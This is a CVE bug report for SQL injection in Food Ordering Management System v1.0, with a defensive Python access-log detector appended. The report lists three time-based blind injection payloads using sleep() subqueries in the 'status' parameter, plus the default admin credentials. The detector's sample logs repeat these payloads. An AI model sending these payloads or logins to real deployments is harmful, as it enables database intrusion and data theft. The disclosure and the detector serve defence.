CVE-2022-42990: bug_report/SQLi-1.md at main · YorkLee2022/bug_report

Food Ordering Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /foms/all-orders.php?status=Cancelled%20by%20Customer.

Tags: CVE, #sql #vulnerability #php #auth


Food Ordering Management System v1.0 by oretnom23 has a SQL injection vulnerability

BUG_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Vendor: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html

Vulnerability File: /foms/all-orders.php

Vulnerability location: /foms/all-orders.php?status=Cancelled%20by%20Customer (injection point: the status parameter)

The status parameter is vulnerable to time-based (delayed) blind SQL injection.

Payload1: ?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(20)))a)%2b%27

With select(sleep(20)) the server response time is 20 seconds.

Payload2: ?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(15)))a)%2b%27

With select(sleep(15)) the server response time is 15 seconds.

Payload3: ?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(10)))a)%2b%27

With select(sleep(10)) the server response time is 10 seconds.
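As an added example (not part of the original report or of the vendor's code), the following Python detector reads web-server access logs for the probe pattern described above, a sleep(N) subquery smuggled into the status parameter of /foms/all-orders.php, and uses the logged request time to tell a mere attempt apart from a request the database actually executed. The log lines, and the nginx-style request_time field at the end of each line, are constructed assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (not real traffic): combined format plus a trailing
# request_time field, as nginx can be configured to emit. Line 2 mirrors the report's
# Payload1; line 3 is the same probe against a host that did not stall.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2022:10:01:02 +0000] "GET /foms/all-orders.php?status=Cancelled%20by%20Customer HTTP/1.1" 200 5120 0.041
10.0.0.9 - - [12/Oct/2022:10:01:30 +0000] "GET /foms/all-orders.php?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(20)))a)%2b%27 HTTP/1.1" 200 5120 20.113
10.0.0.9 - - [12/Oct/2022:10:02:10 +0000] "GET /foms/all-orders.php?status=Cancelled%20by%20Customer%27%2b(select*from(select(sleep(10)))a)%2b%27 HTTP/1.1" 200 5120 0.052
10.0.0.7 - - [12/Oct/2022:10:03:00 +0000] "GET /foms/index.php HTTP/1.1" 200 2048 0.010
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$'
)
# MySQL time-based blind SQLi primitives: sleep(N) and benchmark(N, expr).
SLEEP_RE = re.compile(r'\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.I)
BENCH_RE = re.compile(r'\bbenchmark\s*\(', re.I)

@dataclass
class Finding:
    ip: str
    path: str
    param: str
    delay: float          # seconds the payload asked the database to sleep
    response_time: float  # seconds the server took, from the log
    confirmed: bool       # response stalled at least as long as requested

def scan_line(line):
    """Return a Finding if any query parameter carries a time-based SQLi probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts, rt = urlsplit(m['target']), float(m['rt'])
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; a second pass catches double-encoding
            s = SLEEP_RE.search(value)
            if s:
                delay = float(s.group(1))
                return Finding(m['ip'], parts.path, name, delay, rt, rt >= delay)
            if BENCH_RE.search(value):
                return Finding(m['ip'], parts.path, name, 0.0, rt, False)
    return None

def scan_log(text):
    """Scan a whole log; unparseable or benign lines are skipped."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

A confirmed finding (response time at or above the requested delay) means the injected subquery ran on the database, which is the same signal the report uses to prove the bug; an unconfirmed one still shows the endpoint is being probed.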
